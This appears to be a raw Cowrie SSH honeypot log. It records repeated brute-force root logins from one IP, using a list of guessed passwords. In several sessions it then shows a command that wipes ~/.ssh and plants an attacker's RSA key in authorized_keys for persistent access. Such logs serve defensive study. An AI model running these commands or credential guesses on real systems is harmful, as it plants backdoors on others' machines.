{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56664,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1651bc4ea29","protocol":"ssh","message":"New connection: 212.227.235.229:56664 (1.2.3.4:22) [session: d1651bc4ea29]","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.075809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.076699Z","src_ip":"212.227.235.229","session":"d1651bc4ea29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.178314Z","src_ip":"212.227.235.229","session":"d1651bc4ea29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45944,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e216732a449","protocol":"ssh","message":"New connection: 212.227.235.229:45944 (1.2.3.4:22) [session: 5e216732a449]","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.315096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.316548Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.453641Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.618956Z","src_ip":"212.227.235.229","session":"d1651bc4ea29"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.719262Z","src_ip":"212.227.235.229","session":"d1651bc4ea29"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:30.720254Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.login.success","username":"root","password":"aa112233","message":"login attempt [root/aa112233] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.047714Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:31.343739Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.344394Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.345292Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.485678Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:31.855535Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.856211Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.991187Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:31.992026Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45946,"dst_ip":"1.2.3.4","dst_port":22,"session":"60c264f98ca8","protocol":"ssh","message":"New connection: 212.227.235.229:45946 (1.2.3.4:22) [session: 60c264f98ca8]","sensor":"my-vps","timestamp":"2025-09-08T23:05:32.124845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:32.125675Z","src_ip":"212.227.235.229","session":"60c264f98ca8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:32.262454Z","src_ip":"212.227.235.229","session":"60c264f98ca8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:32.845946Z","src_ip":"212.227.235.229","session":"60c264f98ca8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:33.988172Z","src_ip":"212.227.235.229","session":"60c264f98ca8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45952,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f0d8592ddde","protocol":"ssh","message":"New connection: 212.227.235.229:45952 (1.2.3.4:22) [session: 9f0d8592ddde]","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.117321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.117958Z","src_ip":"212.227.235.229","session":"9f0d8592ddde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.249744Z","src_ip":"212.227.235.229","session":"9f0d8592ddde"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.836103Z","src_ip":"212.227.235.229","session":"9f0d8592ddde"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.972175Z","src_ip":"212.227.235.229","session":"9f0d8592ddde"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:34.973275Z","src_ip":"212.227.235.229","session":"5e216732a449"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:38.770827Z","src_ip":"212.227.235.229","session":"4fc74d961209"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48300,"dst_ip":"1.2.3.4","dst_port":22,"session":"b39e563fdb63","protocol":"ssh","message":"New connection: 212.227.235.229:48300 (1.2.3.4:22) [session: b39e563fdb63]","sensor":"my-vps","timestamp":"2025-09-08T23:05:39.122977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:39.123707Z","src_ip":"212.227.235.229","session":"b39e563fdb63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:39.354485Z","src_ip":"212.227.235.229","session":"b39e563fdb63"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"0","message":"login attempt [localhost/0] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:40.316625Z","src_ip":"212.227.235.229","session":"b39e563fdb63"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:41.550539Z","src_ip":"212.227.235.229","session":"b39e563fdb63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41212,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed7d2e99c1ea","protocol":"ssh","message":"New connection: 212.227.235.229:41212 (1.2.3.4:22) [session: ed7d2e99c1ea]","sensor":"my-vps","timestamp":"2025-09-08T23:05:47.655755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:47.656650Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:47.966294Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Yq123456","message":"login attempt [root/Yq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:49.208034Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:49.882897Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:49.883536Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:49.884661Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:50.196070Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:50.834710Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:05:50.835644Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:05:51.148115Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:51.149119Z","src_ip":"212.227.235.229","session":"ed7d2e99c1ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42586,"dst_ip":"1.2.3.4","dst_port":22,"session":"01b5c1d8b714","protocol":"ssh","message":"New connection: 212.227.235.229:42586 (1.2.3.4:22) [session: 01b5c1d8b714]","sensor":"my-vps","timestamp":"2025-09-08T23:05:51.457549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:51.458354Z","src_ip":"212.227.235.229","session":"01b5c1d8b714"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:51.769188Z","src_ip":"212.227.235.229","session":"01b5c1d8b714"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:53.054281Z","src_ip":"212.227.235.229","session":"01b5c1d8b714"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:54.367847Z","src_ip":"212.227.235.229","session":"01b5c1d8b714"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43576,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ed422167cf5","protocol":"ssh","message":"New connection: 212.227.235.229:43576 (1.2.3.4:22) [session: 4ed422167cf5]","sensor":"my-vps","timestamp":"2025-09-08T23:05:54.678159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:54.679071Z","src_ip":"212.227.235.229","session":"4ed422167cf5"}
